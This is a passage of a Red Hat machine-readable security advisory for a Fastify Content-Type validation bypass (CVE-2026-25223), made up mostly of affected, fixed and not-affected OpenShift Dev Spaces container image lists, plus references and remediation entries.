"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436560"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Fastify, a web framework for Node.js. A remote attacker can exploit a validation bypass vulnerability by appending a tab character followed by arbitrary content to the Content-Type header. This circumvents the request body validation schemas, allowing the server to process the body as the original content type without proper validation. This could lead to unexpected data processing and potential integrity impact.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Fastify: Fastify: Validation bypass due to malformed Content-Type header leading to integrity impact",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Fastify, a Node.js web framework, allows remote attackers to bypass request body validation by manipulating the Content-Type header. This can lead to unexpected data processing and integrity issues in applications. Red Hat products such as Red Hat Enterprise Linux AI, Red Hat OpenShift AI, and Red Hat OpenShift Dev Spaces are affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25223"
},
{
"category": "external",
"summary": "RHBZ#2436560",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436560"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25223",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25223"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25223",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25223"
},
{
"category": "external",
"summary": "https://fastify.dev/docs/latest/Reference/Validation-and-Serialization",
"url": "https://fastify.dev/docs/latest/Reference/Validation-and-Serialization"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125",
"url": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272",
"url": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/commit/32d7b6add39ddf082d92579a58bea7018c5ac821",
"url": "https://github.com/fastify/fastify/commit/32d7b6add39ddf082d92579a58bea7018c5ac821"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/security/advisories/GHSA-jx2c-rxcm-jvmq",
"url": "https://github.com/fastify/fastify/security/advisories/GHSA-jx2c-rxcm-jvmq"
},
{
"category": "external",
"summary": "https://hackerone.com/reports/3464114",
"url": "https://hackerone.com/reports/3464114"
}
],
"release_date": "2026-02-03T21:21:40.268000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
